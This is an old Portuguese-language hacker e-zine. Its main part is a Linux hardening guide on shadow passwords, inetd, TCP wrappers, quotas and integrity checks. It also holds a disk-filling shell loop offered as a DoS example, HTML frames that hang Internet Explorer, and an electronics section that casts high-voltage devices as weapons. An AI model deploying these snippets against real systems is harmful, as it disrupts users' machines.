:-:-: Topicos da edicao :-:-:

:|: I  -x- Melhorando a seguranca do seu linux
:|:     -x- Password Shadowing
:|:     -x- Desabilitando services desnecessarios
:|:     -x- Permitindo e barrando o acesso
:|:     -x- Quotando os users
:|:     -x- Checando exploitz e outros bugz
:|:     -x- Usando a Rhino9 Security Tool
:|:     -x- Reforcando-se com o chkexploit
:|:     -x- Protegendo suids e sgids
:|:     -x- Previnindo-se com o MD5


-=-=- I - Melhorando a seguranca do seu linux -=-=-

        A  primeira  pergunta que muitos  fariam seria : "Se o computador vai
ser  usado  soh  por mim,  pra que  se  preocupar  com isso?"  Mas, quando se
trata de linux, uma simples conexao a internet torna o seu computador
completamente  vulneravel  se  medidas de precaucao nao forem tomadas antes..
Aconselho que logo apos de  terminar a instalacao jah siga estes  passos  que
vou descrever.
	Use  SEMPRE  password shadowing! Pelo nome, voce jah tem uma nocao do
que eh. Isto faz com as senhas encriptadas fiquem guardadas no /etc/shadow,ao
inves do tradicional /etc/passwd, e este arquivo pode ser  lido  apenas  pelo
root, ao contrario  novamente do  /etc/passwd. Eh preciso executar o programa
que faz esta "magica transformacao" toda  vez que voce adicionar  um  usuario
novo ao sistema! Voce jah deve estar se perguntando como fazer isso, nao eh?!
Simples,  no prompt  basta executar o utilitario 'pwconv'. Pelo menos eh este
aqui no meu querido RH 5.1! :-p


[root@BLAcK_MaSK-OS /]# cat /etc/passwd
root:QJQHI2B8/1fDQ:0:0:root:/root:/bin/bash
blackmask:lope1CSkQBq7M:500:500:Sr BLAcK MaSK:/home/blackmask:/bin/bash
[root@BLAcK_MaSK-OS /]# pwconv
[root@BLAcK_MaSK-OS /]# cat /etc/passwd
root:*:0:0:root:/root:/bin/bash
blackmask:*:500:500:Sr BLAcK MaSK:/home/blackmask:/bin/bash


PS.:  Se voce usa o comando 'userdel' para excluir usuarios, tome cuidado com
uma coisinha.  Este  comando irah excluir a entrada do usuario do passwd e do
shadow se for preciso,  mas nao  do /etc/group, isto significa que o grupo do
usuario,  se  voce  usava  o  default, isto eh, digamos joao uid=501 gid=501,
continuarah existindo, e aih,  se voce adicionar um novo usuario, por default
ele ficarah com o "proximo" id disponivel, no caso seria 501, jah que ele foi
excluido anteriormente e agora estah livre. E usarah o gid=501. Percebeu? Ele
estarah usando o gid do outro usuario. Entao, se voce adicionar de novo o usu-
ario que tinha excluido por primeiro, ele terah um novo uid e gid, mas os fi-
les do primeiro poderao ser lidos ateh pelo usuario que adicionamos por ultimo.
Bah, ficou complicado...  Resumindo:  eh possivel que usuarios novos usem por
default  o  grupo  de usuarios antigos, e estes possam visualizar os arquivos
daqueles,  mesmo  que voce  nao queira. Pode parecer banal, mas eh importante
ter cuidado com isso..


        Agora  seu sistema jah esta 1% mais seguro.. hehehe. O  proximo passo
eh  desabilitar  os  services  que  voce nao usarah, impedindo deste modo que
estranhos possam obter informacoes a respeito da sua maquina.
        Edite  o  arquivo /etc/inetd.conf e ponha um "#" bem grande na frente
dos  services que  voce nao usarah. Tenha certeza que services como o finger,
systat  e netstat estao DESABILITADOS, pq eles sao ferramentas poderosissimas
for  hacking!!  Nao  se preocupe que voce poderah rodar estes services a hora
que quiser  a  partir  da  console  principal (a tua maquina), mas por acesso
remoto o acesso serah negado. 


--- /etc/inetd.conf ---
#finger	stream	tcp	nowait	root	/usr/sbin/tcpd	in.fingerd
#systat	stream	tcp	nowait	guest	/usr/sbin/tcpd	/bin/ps -auwwx
#netstat	stream	tcp	nowait	guest	/usr/sbin/tcpd	/bin/netstat -f inet
--- EOF ---


        Verifique  os  arquivos /etc/hosts.allow e /etc/hosts.deny,  sao eles
que vao liberar ou barrar o acesso aos  services a  quem  voce quiser. O modo 
que  eu  acho  mais  facil  de  se  controlar  isto eh deixar tudo fechado no
hosts.deny  e ir  liberando  pra quem voce quiser no hosts.allow, isso porque
o hosts.allow tem mais "importancia" para o sistema e eh  quem  dah a "ultima
palavra".


--- /etc/hosts.deny ---
All:All
--- EOF ---


--- /etc/hosts.allow ---
in.telnetsnoopd: localhost provedor-dos-meus-amigos.com.br
in.ftpd: localhost provedor-dos-meus-amigos.com.br
--- EOF ---


        Cheque o /etc/exports.  Ele  define o diretorios que sao exportados e
podem  ser  simplesmente  mountados  remotamente.  Deixe-o vazio, a menos que
existam boas razoes para o contrario...
        Se voce eh frequentador assiduo do #hack0slam0s e agora que tem Linux
quer aparecer um pouquinho, CUIDADO!  Nao  queira  ser  bonzinho  adicionando
shells  para  toda a galera. Se voce ainda eh meio beginner, nem pense nisso,
abra  no  maximo  um ftp para os teus "amigos". Eh claro que voce pode usar o
telnetsnoopd  para  controlar  o que se passa no terminal, mas mesmo assim eh
perigoso. Nao  eh  que voce tenha que ter medo dos super requers do #hackers,
DIFICILMENTE  algum deles vai rootiar a sua maquina, porem, eh possivel rodar
algum  script  que  poderah  deixar  seu  HD  lotadim  lotadim.  Por isso, eh
ALTAMENTE aconselhavel que voce estabeleca uma  QUOTA de espaco utilizavel no
teu HD para todos os users da tua maquina.
        Um bom exemplo para se lotar um HD eh criar um arquivo e ir adicionan-
do  frases a ele usando uma estrutura de loop, que pode ser facilmente criada
em um simples script como este:


--- HD DoS ---
#!/bin/sh
while : ; do
        echo "BLAcK MaSK 4 President." > sucked
	echo "Quanto maior a msg, melhor..." >> sucked
	echo "phuckphuckphuckphuckphuckphuckphuckphuck" >> sucked
	echo "phuckphuckphuckphuckphuckphuckphuckphuck" >> sucked
	echo "phuckphuckphuckphuckphuckphuckphuckphuck" >> sucked
	echo "phuckphuckphuckphuckphuckphuckphuckphuck" >> sucked
	echo "phuckphuckphuckphuckphuckphuckphuckphuck" >> sucked
	echo "phuckphuckphuckphuckphuckphuckphuckphuck" >> sucked
done
--- EOF ---


        Alem do HD ficar completamente cheio, voce terah problemas para execu-
tar outros programas, causando um denial of service... heheheh


PS.: Ateh o momento, o pacote QUOTA NAO suporta particoes que NAO sejam ext2!
(casos em que voce possui Slackware e instalou-o na mesma particao do rWIN95,
ou mesmo, se voce quisesse quotar a particao do rWIN95).


	Aih voce pergunta: "Tio, como eu faco para quotar?"
        Okz... vou explicar. Primeiramente o seu kernel deve ter sido compila-
do com suporte a quota. 
	"Como sei disso?"
	Voce pode procurar no arquivo ".config" do diretorio onde estah o seu
kernel.


[root@BLAcK_MaSK-OS /]# grep QUOTA /usr/src/linux/.config
CONFIG_QUOTA=y
[root@BLAcK_MaSK-OS /]#


        Otimo! Neste caso voce jah pode ir adiante. Caso nao esteja com supor-
te (CONFIG_QUOTA is not set) voce deve primeiro recompilar seu kernel.
	"Como recompilo?"
	Procure no "The Linux Manual" ou entao no Kernel-HOWTO (para encontrar
estas fontes veja no inicio da materia).
	Veja se voce tem os utilitarios de QUOTA (edquota, quotacheck, quotaon,
etc). Em alguns sistemas, eles nao vem junto com o pacote de instalacao e voce
terah que fazer o download na Internet.
QUOTA SOFTWARE disponivel em : 
ftp://ftp.funet.fi/pub/Linux/PEOPLE/Linus/subsystems/quota/all.tar.gz.

	Entao, voce deverah compilar e instalar (isso voce sabe fazer neh?!).
Agora temos que modificar alguns arquivos de configuracao:


--- /etc/fstab ---
#
# You should be using fstool (control-panel) to edit this!
#
# <device>    <mountpoint>   <filesystemtype> <options> <dump> <fsckorder>

/dev/hda3                 /                         ext2   defaults 1 1
/dev/cdrom                /mnt/cdrom                iso9660 noauto,ro 0 0
/dev/fd0                  /mnt/floppy               ext2   noauto 0 0
/dev/hda1                 none                      ignore 0 0 0

none                      /proc                     proc   defaults
/dev/hda2                 none                      swap   sw
--- EOF ---


	Modifique as linhas de configuracao nas particoes que voce quer quotar.
No meu caso, ficaria assim:


/dev/hda3                 /                         ext2   defaults,usrquota,grpquota 1 1


	Agora vah ateh o diretorio raiz da particao a ser quotada e crie o(s)
arquivo(s) quota.user e/ou quota.group - ele(s) deve(m) ser rw-------


[root@BLAcK_MaSK-OS /]# touch quota.user
[root@BLAcK_MaSK-OS /]# touch quota.group
[root@BLAcK_MaSK-OS /]# chmod 600 quota.*


	Reinicie o computador para que as modificacoes tenham efeito... Voce
jah viu esta frase antes, neh? ;-) Press CTRL+ALT+DEL ou "init 6" (este ultimo
eh mais chiquezinho! hehehe)
        Blz... agora soh falta definirmos o espaco que cada usuario ou  grupo
poderah usar. Este espaco eh definido por BLOCOS e ARQUIVOS utilizaveis. Usa-
rei  dois  limites  para alertar o usuario de que ele ultrapassou a marca dos
blocos e/ou arquivos disponiveis para ele: SOFT e HARD.
        O  limite  Hard  funciona de dois modos e apenas se eu ativar o Grace
Period, isto eh, o tempo que eu vou definir em que o usuario serah apenas ad-
vertido de que ultrapassou seu limite Soft, e apos o Grace Period se completar
o  usuario  serah  obrigado  a  obedecer o limite Soft. A outra forma eh se o
proprio limite Hard definido antes foi ultrapassado.
        Agora  usarei  o  'edquota'  para  definir  o  espaco  para  o usario
"blackmask" e para o grupo "hackphr", e apos, determinarei o Grace Period de
duas semanas. O editor de texto padrao serah aberto e eh soh digitar os blocos
e files de acordo com o exemplo. Voce nao precisa mudar os blocks ou inodes in
use, pois eles sao ajustados automaticamente.


[root@BLAcK_MaSK-OS /]# edquota -u blackmask
Quotas for user blackmask:
/dev/hda3: blocks in use: 10, limits (soft = 10, hard = 20)
inodes in use: 7, limits (soft = 10, hard = 20)
[root@BLAcK_MaSK-OS /]# edquota -g hackphr
Quotas for group hackphr:
/dev/hda3: blocks in use: 10, limits (soft = 10, hard = 20)
        inodes in use: 7, limits (soft = 10, hard = 20)
[root@BLAcK_MaSK-OS /]# edquota -t
Time units may be: days, hours, minutes, or seconds
Grace period before enforcing soft limits for users:
/dev/hda3: block grace period: 14 days, file grace period: 14 days


        Agora  digamos  que voce tem 10 usuarios e quer definir a mesma quota
para  todos,  e  estah  com preguica de digitar tudo para cada um. Entao voce
poderah simplesmente executar o seguinte comando:


[root@BLAcK_MaSK-OS /]# edquota -p blackmask `awk -F: '$3 > 499 {print $1}' /etc/passwd`


	Assumi que o primeiro usuario comeca com ID 500 e assim por diante...
Em caso contrario, defina outra ID. 


	W311, eu acho que a melhor forma de proteger um sistema eh hackeando-o
e  a  melhor forma de hackear eh saber proteger, por isso, vamos procurar por
outros  bugs  e  mesmo rodar exploits. Usarei tambem a Rhiino9 Security Tool,
que  vai  facilitar  nossa  vida  em muito! Primeiro, seria bom voce anotar a
versao de seus programas principais, como sendmail, pine, finger, mount, lpr,
minicom, traceroute, e  todos os outros que voce lembre que existem exploits.
Depois, vah  na Rootshell (www.rootshell.com) e procure pelos exploits destes
programas  e compare com a versao em que eles atuam.  Caso voce seja atingido
por algum exploit, nao perca tempo e procure por versoes mais atuais (Uma boa
dica seria que voce assinasse a lista da Rootshell e da Bugtraq - ver no
final da materia).
      Bem, agora veremos o script da Rhino9 que vai lhe ajudar bastante  para
encontrar as principais falhas... O que ele faz exatamente? Bem, nao eh nenhu-
ma  magica, poderia  se fazer manualmente, mas voce economizarah um bom tempo
com ele.


ACOES DO RHINO9 SECURITY TOOL

-Checa a versao do kernel
-Checa por todas as contas sem senhas
-Lista todos os programas suid
-Avisa os programas que possuem exploit conhecido
-Checa se hah algum sniffer rodando
-Checa as permissoes nos diretorios principais
-Procura por backdoors no inetd
-Procura pelos arquivos .rhosts no sistema
-Checa os diretorios exportados
-Lista as portas ativas
-Checa se o ftp anonimo estah abilitado e diz como desabilitar
-Checa por relacoes de confianca no xhost
-Manda um mail pra voce avisando sobre os resultados


        Este script precisa de outro programa, strobe, que voce precisarah
quando rodar  o Rhino9  Security  Tool para checar pelas portas abertas...
As fontes destes programas tambem estao incluidas no dir sources/ que acompa-
nha o zine.
Caso queira procurar por versoes mais novas ou outros programas de seguranca,
visite a HP do Rhino9 Security Group : http://www.rhino9.org

        Na  minha  humilde  opiniao, o  RHINO9 Security Tool, eh uma das mais
completas ferramentas de seguranca, porem, peca num dos principais  quesitos:
busca por exploits conhecidos; sao poucos os exploits que este programa lista
como conhecidos. Por isso, resolvi por mais esta  ferramenta  que  vai apenas
procurar pelos programas vulneraveis a exploits.

	  Fonte do chkexploit no diretorio sources.
        Para  obter  sempre  a ultima versao do chkexploit visite este site :
ftp://ftp.pangeia.com.br/pub/seg/pac/chkexploit.tar.gz
        Ou se quiser receber uma notificacao sempre quando uma nova versao for
lancada mande um mail para chkexploit-announce-request@pangeia.com.br,
com "subscribe chkexploit-announce" no corpo da mensagem.
        Para  inscrever-se  na  lista  da  Bugtraq  mande   um   email   para
listserv@netspace.org, sem assunto e no corpo da msg "subscribe bugtraq".
	Para assinar a lista da RootShell, vah na propria hp dela que voce en-
contrarah maiores informacoes. http://www.rootshell.com

        Bem,  como  voce  pode perceber, o que estas ferramentas de seguranca
fazem  eh  simplesmente  checar  pelas vulnerabilidades e relatah-las ao usu-
ario.  Cabe  a  voce, hack0, ou a voce, admin, explorah-las ou consertah-las.
Elas  nao vao hackear o servidor para voce, sao de SEGURANCA,  voce nao leu o
titulo? Contudo, podem e devem ser usadas para obter uma lista das principais
vulnerabilidades  do  sistema  em  que voce estah "trabalhando" e ajudah-lo a
ganhar a tao sonhada ID Zer0.
	Alem disso, quando se checa pelos programas exploitaveis, apenas diz-
se que sao vulneraveis e sugerem que voce faca um update para uma versao mais
nova do programa ausente daquele bug ou tire o suid bit. Mas em muitos casos,
voce  jah estah com a versao mais nova e o bug eh recente ou se voce  tirar o
suid bit o programa perderah a funcao para os demais usuarios (mount, lpr,
etc). Entao, o melhor a fazer eh usar um OVERFLOW WRAPPER e proteger cada pro-
grama vulneravel do seu sistema, se quiser, proteja todos os suids e sgids da
sua listinha que voce criou (Voce jah tem uma neh? Vide HackPHR #05), afinal,
seguranca em excesso nao faz mal a ninguem... ;-)
        O Overflow Wrapper, como o proprio nome jah diz, ira proteger o pro-
grama exploitavel, impedindo overflows. O que ele faz eh se antecipar ao pro-
grama  original e checar todos os argumentos que sao passados a ele. Para uma
melhor compreensao, vejamos o seguinte esquema:


ANTES =>  prog_vul(4555)  +       buffer overflow & exploit = R00T
          splitvt                                      splitvt.exp

DEPOIS => overflow_wrapper(4555) --> checagem de parametros --> prog_vul(555)
          splitvt                                               splitvt.real


        O  file  'splitvt',  com  este  nome  no  inicio,  eh  renomeado para
'splitvt.real'.  O source  do wrapper  eh  compilado  com o nome de 'splitvt'
Nota-se  que  o 'splitvt.real' deixa de ser suid e portanto uma ameaca ao seu
sistema. Quem passa a ser suid eh o wrapper e soh entao o wrapper ira executar
o 'splitvt.real'.
        Percebe-se  que  nenhuma mudanca foi feita no codigo do splitvt.real,
portanto  ainda  pode sofrer overflows, contudo, como ele deixa de rodar como
root, este deixa de ser um perigo.
        Instrucoes para a instalacao e mais comentarios vem junto com a fonte.


        Agora passemos ao proximo topico. Suponhamos que o seu sistema foi in-
vadido e foram instaladas backdoors (ou trojans) nele. Se o cara foi esperto,
voce nunca descobrirah sozinho que existem backdoors, e se criar backups pos-
teriormente,  todos eles possuirao backdoors e assim, mesmo que voce descubra
que  foi  invadido e retornar os backups de nada adiantarah... Entao, como me
certificar que nenhum binario foi alterado? Atraves dum programa de assinatura
digital.  Voce  pode utilizar o proprio 'sum'  que vem junto com o *nix, mas,
eh aconselhavel que se utilize  algo  mais poderoso, isto eh, mais dificil de
se crackear ou forjar a assinatura. Aih aparece o MD5. A utilizacao eh extre-
mamente simples: apos compila-lo, rode-o => # md5 file


Ex. % md5 /bin/bash
MD5 (/bin/bash) = 27713cf3152e7631257687cedc23848e


        Aih  voce  pega, cria tua listinha de assinaturas digitais, imprime e
guarda no cofre. Depois, se suspeitar de hack, cria uma listinha nova e  com-
para com a que tah no cofre. A fonte e a documentacao do MD5 voce encontra em
atachado ao zine, ou se preferir, em ftp://ftp.cert.org/pub/tools/md5


        Bom, esta materia por se tratar de um assunto tao polemico como segu-
ranca,  eh  necessariamente  incompleta, entao, continuarei com este assunto,
quem sabe, em futuras edicoes do zine, talvez abrangendo topicos mais heavy.


								RTFM!


OBS. AOS SUPER RE'QUERS DO IRC: HD = Winchester :-p

   
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                  
 08 - Eletronica
                  
    xt0rm
                     -


   CONTEUDO:

   Terico:

   XX.1 - DiSCLAiMER
   XX.2 - INTRO ABOUT THiZ ARTICLE
   XX.3 - HISTORIA E INTRODUAO AO ESTUDO DO CAPACITOR (JARRA DE LEYDEN)
   XX.4 - DESTALHES CONSTRUTIVOS NA FABRICAAO CASEIRA DE CAPACITORES
   XX.5 - 
   XX.X - INTRODUAO AO LASER



                                 DiSCLAiMER
                                -=-=-=-=-=-=-

   Esta materia vai tratar de assuntos muito interessantes, mas sao muito pe-
rigosos. Nao pense que esses "brinquedos" aqui sao soh brincadeirinha e que o
choque eh fraco. Alguns equipamentos de Alta Voltagem podem provocar a morte
instantanea em qualquer erro q vc cometer, portanto, eh recomendavel q vc te-
nha alguma experiencia com esse tipo de dispositivo antes de meter a mao na
massa... Se vc quiser assustar alguem, ou fazer uma brincadeira, pare de ler
o zine e vah ateh a lojinha do GLUGLU, e compre um pintinho amarelinho...
ENTAO, sendo assim, eu nao to nem aih pro q vc tah fazendo e nem se vc vai 
torrar seu vizinho ou torrar a si mesmo, faa as coisas com consciencia e por
sua responsabilidade...




                          INTRO ABOUT THiZ ARTICLE
                         -=-=-=-=-=-=-=-=-=-=-=-=-=-

   Deve parecer estranho eu estar escrevendo algo sobre anarquia pro zine, mas
eh o seguinte, esta materia nao eh bem "anarquica", eu soh coloquei esse nome
pq discutirei agora a utilizaao da eletronica, e da tecnologia de ponta para
a fabricaao de humm, digamos, "instrumentos belicos", ou numa melhor coloca-
ao, pequenas armas para defesa pessoal. Eh claro q quem quiser usar para ata-
que pessoal tmb esta liberado! hehehe
  Vou descrever neste artigo a fabricaao de "bagulhinhos" q podem gerar altas
tensoes a partir de pilhas, a construao caseira de lasers, e outros objetos
decorativos. Tmb vou falar um pouco sobre o capacitor, sua historia, e sua
possivel presena em fatos historicos.
   Os mais manes jah devem estar pensando q a materia, alem de nao ter nada a
ver com o nome, ainda nao tem nada a ver com o zine: HACK AND PHREAK.
   Bem, na realidade, eu jah tava de saco cheio daquela mesma coisa chata e 
repetitiva de sempre, entao resolvi variar um pouco... pois mesmo nao se tra-
tando dos assuntos normalmente discutidos no zine, nao deixa de ser interessan-
te.
   Eu mesmo ateh nao sou muito chegado nesse negocio ne ANARKOISSO, ANARKOAQUI-
LO, uma das coisas q nao suporto eh ver o ANARKOPHREAKING, ou seja, destruir
orelhoes, ou mesmo destrui-lo apenas para roubar as fichas, ou coisas do gene-
ro, ou apenas por diversao, alem de eu nao ver nada de divertido nisso...
   Agora, quero tmb comear a escrever sobre eletronica... Quem tiver interes-
se, por favor, mande um mail com seus comentarios a respeito de minhas mate-
rias...  ;)

   Agora, um pouco de historia... hehehe
   Bem, quem faz essas coisas, eh chamado de louco, maluco, e tal... Alias, eu
tm sou chamado de louco seriamente... Quem mexe com isso sabe... Na verdade, 
eu nao me considero louco, loucos eu acho q sao as pessoas q nao entendem o
"truque" da magica, das magias q nos fazemos, eles com suas mentes mesquinhas
nao conseguem compreender, entao como eles nao entendem porra nenhuma eles
dizem que nos somos loucos... hueuheuheuhe...
   Creio q todos jah ouviram falar de uma passagem da Biblia, onde se fala da
misteriosa Arca da Aliana, uma arca construida por Moises para guardar com 
segurana as tabuas da lei, a vara de sei la o q... e tal... Pois eh, a passa-
gem fala bem assim: q a arca era construida de madeira, e era forrada de ouro
por dentro e por fora...(este eh o principio da Jarra de Leyden...) e q haviam
coroas de ouro logo acima da arca...(q seria para descarregar o capacit...
digo a arca...). Pois entao, ateh sobre as pragas q ele lanou sobre o egito,
q atraiu uma grande nuvem de gafanhotos e tal... Isso quer dizer q Moises co-
nhecia os sons das frequencias q atraiam ou repeliam os insetos, metodos q sao
usados hoje em dia... Enfim, ele sabia demais... Mesmo assim, arqueologos
encontraram artefatos de civilizaes antigas, q nao eram nada mais q pilhas
ou geradores de energia eletrica...
   Eu creio q houveram varias civilizaes antigas q sabiam demais. E que uma
pessoa com todo esse conhecimento, pode fazer oq quiser... Desde q saiba usa-
los com sabedoria... Bom, acho q jah passei a minha mensagem e vamo para com 
esse papo q parece aula de teologia, ou historia sei lah... bah... hehehe



      HISTORIA E INTRODUAO AO ESTUDO DO CAPACITOR (JARRA DE LEYDEN)
     -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   O seguinte... Caso vc tenha uma fonte de alta voltagem, e baixa corrente,
vc pode usar um capacitor para gerar aquele estouro de alta corrente... Vc 
pode notar q com um capacitor de 400 V, quando carregado direto da tomada,
jah dah um bom tranco quando descarregado, e um estouro q assusta os mais con-
centrados, imagine entao um capacitor carregado com 30kV...
   Vc pode encontrar bons capacitores em lojas de eletronica, mas para alta
tensao, vc tem q fazer um caseiro, portanto, antes de comear a falar sobre
fontes de HV (High Voltage), vou falar sobre este componente muito importante
da eletronica, O CAPACiTOR:
   Como todos sabem, os atomos sempre tentam chegar ao equilibrio eletronico,
sendo assim, q a maioria dos corpos possui uma neutralidade, ou seja, a dispo-
sio dos eletrons nos atomos esta bem distribuida. Mas nem sempre eh assim,
existem casos onde algum corpo etah com excesso de eletrons, e outro com pou-
quissimos eletrons... Sendo assim, um corpo pode estar carregado negativamente
ou positivamente. A isto chamamos de eletricidade estatica, ou eletricidade
"parada". Vamos a um pequeno exemplo: Quando vc atrita um pente no cabelo, ou
um bastao de vidro em um pedao de flanela, um dos corpos tende a perder ele-
trons, ficando assim carregados positivamente (falta de eletrons), e o outro
logicamente ficara carregado negativamente (excesso de eletrons). Portanto,
ha uma diferena de potencial entre os dois...
   Nao sao apenas pentes e flanelas q se carregam, por exemplo, um aviao voan-
do, o atrito com o ar, acumula eletricidade estatica em sua fuselagem, existem
avioes q aproveitam a eletricidade estatica q fica acumulada para alimentar
alguns instrumentos internos... Talvez vc jah deve ter visto esses caminhoes
tanque, alguns ficam com uma corrente arrastando no chao o tempo inteiro, para
descarregar a eletricidade estatica acumulada no tanque, evitando assim, a 
possivel combustao da carga (combustivel). Alguns quando para apenas aterram
alguns eletrodos. Ateh mesmo pessoas podem acumular eletricidade estatica,
por exemplo, alguem q anda descalo no tapete, assim carregando o corpo, e
logo em seguida, pega no trinco de uma porta, leva um choque por causa da
descarga...
   Assim, durante muito tempo, os cientistas estudaram esta curiosa proprieda-
de dos corpos de acumularem cargas eletricas. Ateh q descobriram dispositivo
capaz de acumular as cargas eletricas, q primeiro se chamou de JARRA DE LEYDEN
e depois capacitor, ou condensador como eh comunmente conhecido. Essa jarra
constituia-se de um frasco de vidro (isolante eletrico) forrado internamente
e externamente por folhas de metal, formando assim as armaduras... Veja o es-
quema:


                                   /-\ <- esfera
                                   \_/    de metal
                           _________|_________
                          |___________________|
                           //       &       \\
                          ||        &        ||
                         ||       &       ||
                         ||       &       ||
                         ||       &       ||
                         ||       &       ||
                         ||       &       ||
                         ||       &       ||
                         ||       &       ||
                           \\_______________//


   LEGENDA:
         
    : Folha de Metal

   & : Corrente de Metal


   Como a borracha, a invenao desta insteressante garrafa nao tinha nenhuma
utilidade aparente, ela serviu apenas para os cientistas ficarem dando choques
um nos outros! Apenas mais tarde com a evoluao da eletronica o capacitor 
demonstrou ser um importante componente...
   Assim, baseado nos principios da jarra de Leyden, mais tarde foi desenvol-
vido o capacitor q conhecemos hoje:

                           
                           ||
                           ||
                           ||         
           ================||===============
                  |        ||         |
              terminal     ||      terminal
                           ||
                           

  : Armadura (placa de Metal)

|| : Dieletrico (isolante)

   O capacitor funciona da seguinte maneira:
   Quando aplicamos uma ddp nos terminais do capacitor, estamos carregando-o.
Depois de um certo tempo, depois q ele tiver carregado totalmente, assim q 
juntarmos os seus terminais, estaremos descarregando ele. O funcionamento eh
muito simples, mas as aplicaes praticas dele nos circuitos eletronicos sao
diversas. Qquer informaao complementar sobre o uso dessas maravilhas, vide o
artigo do TheCroW sobre eletronica...



        DESTALHES CONSTRUTIVOS NA FABRICAAO CASEIRA DE CAPACITORES
       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-






                             INTRODUAO AO LASER
                            -=-=-=-=-=-=-=-=-=-=-

   Primeiramente vou dar uma breve introduao do q seria o laser, pra depois      
dar umas especificaoes tecnicas... Antes de mais nada vc deve estar pensando,   
nossa, esse negocio de laser nao eh acessivel pra mim, eu nunca vou encontrar
o material... Bom, de um certo lado, a unica coisa meio critica na construao
eh o tubo do material desejado, pois ele precisa de uma grande precisao na 
posiao dos espelhos... O q vc pode deixar jah prontinho pra depois ficar cor-
rendo atras do tubo, eh a fonte excitadora... Deve ser por isso q eu jah colo-
quei esse negocio de laser junto com essa materia, pois ela vai ajudar muito
a construi-la. Nesta materia falarei mais sobre os laser de HeNe (Helio Neonio)
mas nao quer dizer q vou deixar de fora os outros tipos. Pode ser que em mate-   
rias futuras, eu coloque outros projetos, vai depender se alguem vai ler isso
aqui. hehehe, tomara q sim, que algum interessado q entenda leia, e mande um
mail com a opiniao...  ;)


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                  
 09 - Bugz
                  
    tOneOne
                     -


y0!

Essa materia traz alguns bugs bem simples, mas c00lz.

- WS_FTP

Se vc colocar uns 100 ou + caracteres no campo host/adress, e conectar, o 
WS_FTP, da akele famoso erro ( Este programa executou uma operacao ilegal...)


- M$ Internet Explorer


Fucando nums esquemas com frames, eu percebi que fazendo pages com o conteudo
abaixo, o M$ IE simplesmente Trava ;)


---[ Index.htm

<html>
<head>
 <title>HackPHR Group - Explorer Phuck - By tOneOne</title>
</head>
<frameset frameborder="0" cols="100,*">
  <frame src="frame.htm" name="side">
  <frame src="index.htm" name="main_frame">
</frameset>
</html>

---[ Frame.htm

<HTML>
<HEAD>
   <TITLE>Hack Frame</TITLE>
</HEAD>
<BODY TEXT="#FF0000" BGCOLOR="#000000" LINK="#3366FF" VLINK="#009900">
<FONT COLOR="#3333FF"><FONT SIZE=+2>HackPHR Group!!!</FONT></FONT>
</BODY>
</HTML>


Bom deixa eu explicar, esse codigo ai faz o M$ IE entrar em loop infinito,
ou seja ele abre o frame.htm, e depois abre o index.htm de novo!

E assim infinitamente, esse codigo foi testado c/o IE 4, mas pode funcionar
c/outros browsers.

Entaum... T+

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                  
 10 - Scene Info
                  
    tOneOne
                     -

Hum... hehehhe texto em ingles, bah, se naum quiser naum leia, aqui nao e
grupo de tradutores ;)
Esses dias navegando na net eu achei esse txt, interessante, pois fala da
realidade da cena, underground da internet. Isso inclui Hackers, Phreakers,
Warez, etc...

Fala tambem bastante da cena artistica desses grupos, tipo como acontecia
nas BBSs, e agora a maior forca e nos grupos warez, vale a pena ler!



s  c  e  n  e    i   n   f   o ? 

Many people have tried to explain the scene to people from the outside and a
lot of these people have failed in thier attempts. The reason that people
fail to understand why we do what we do is because they havn't been involved
with it as long as most of us. They havn't put as much time into creating
this online community. when i say time, I mean staying up until 5am
everynight so that you can call out to every board you are on, or getting
on irc and sitting there like bums for hours upon hours and talking about
nothingness. noone understands our drive, our motivation, to do these
meaningless things, we hardly understand why, we do it though. weve been
 doing it for years, and we'll continue to do it for years to come.

"In the shadows of night, a 13 year old boy sits and types for hours and 
hours. Noone knows what he's doing, the only light he can see by is the dim
light that is cast down by his ever faithful cga monitor. The neighbors see
the lights flickering everynight, and see the dimly lit face of thier
neighbors son. 5:30 am rolls around and just as the normal world is waking 
up, the boy goes off to bed, his only reason for sleeping is the fear of his
mothers wrath. she knows he is up, mothers always know. she doesnt know 
what her son is doing though. Maybe he is developing a way to determine the
lotto numbers next week, or maybe he is designing the next nuclear weapon.
maybe he is hacking into citibank and the police are going to be there 
shortly, and the only reason he went to sleep was because he knew he screwed
up." The parents know nothing, all they can trust are thier suspiscions,
and those often lead to more than a lecture. 

if you ask most sceners, this is a common tale. most of us started in our 
early teens some of us before then. we have learned as much as anyone could 
have learned about the ins and outs of the computer world, just to compete 
with eachother online. for some, thier strive is to gain status in a world 
that certainly isnt democratic, anarchist maybe, certainly not democratic.
for others its just to fill a common gap in thier lives that is created by 
somthing we all know as adolescence. either way, we do it, and weve been 
doing it since the early 80s, possibly even before that. Due to this hidden
dedication most of us have grown up to be successful in the computer 
industry doing only god knows what to computers to make the common person 
happy. 

Now that you understand how much time we are investing into the computers,
maybe you should now learn somthing about what it is that we are doing.
I'll just break into it directly. there are many "scenes" one of the scenes
is called the art scene, one is called the warez scene, another is h/p/a 
(just call it hacking.) there are other scenes, such as the demo scene,
which a lot of people are already familiar with, somehow finding an award
wining future crew demo from 1993 on a bulletin board system, or possibly 
the tracking scene if you could call it a scene, tracking is creating music
with your computer, (much more complicated than it sounds.) Recently a new 
scene was born, however most of the people dont recognize them as thier own 
scene. the mp3 "scene" is one of the newest and fastest growing and the 
reasons behind this are simple, but rather complex to explain. hit this line
to go to a layer3 page to read more about what it is.

The scene that I am personally involved in is known as the "art scene." the
art scene is an international community of artists that are gathered 
together in groups. these groups of artists then in turn release a
collective known by nothing other than an "art pack." inside the art scene 
there are some different mediums, they can be broken down into a few 
different catagories. ascii, ansi, rip, hirez and lit. ascii seems to be 
the strongest right now as well as hirez, however as far as popularity is 
concerned people seem to be stuck in the past with ansi. when it comes to 
respect, high resolution art(hirez) generally doesnt receive any. I can 
rack my head for hours and i'll never understand this. rip was a medium 
that also never received any respect and should have, some of the artists 
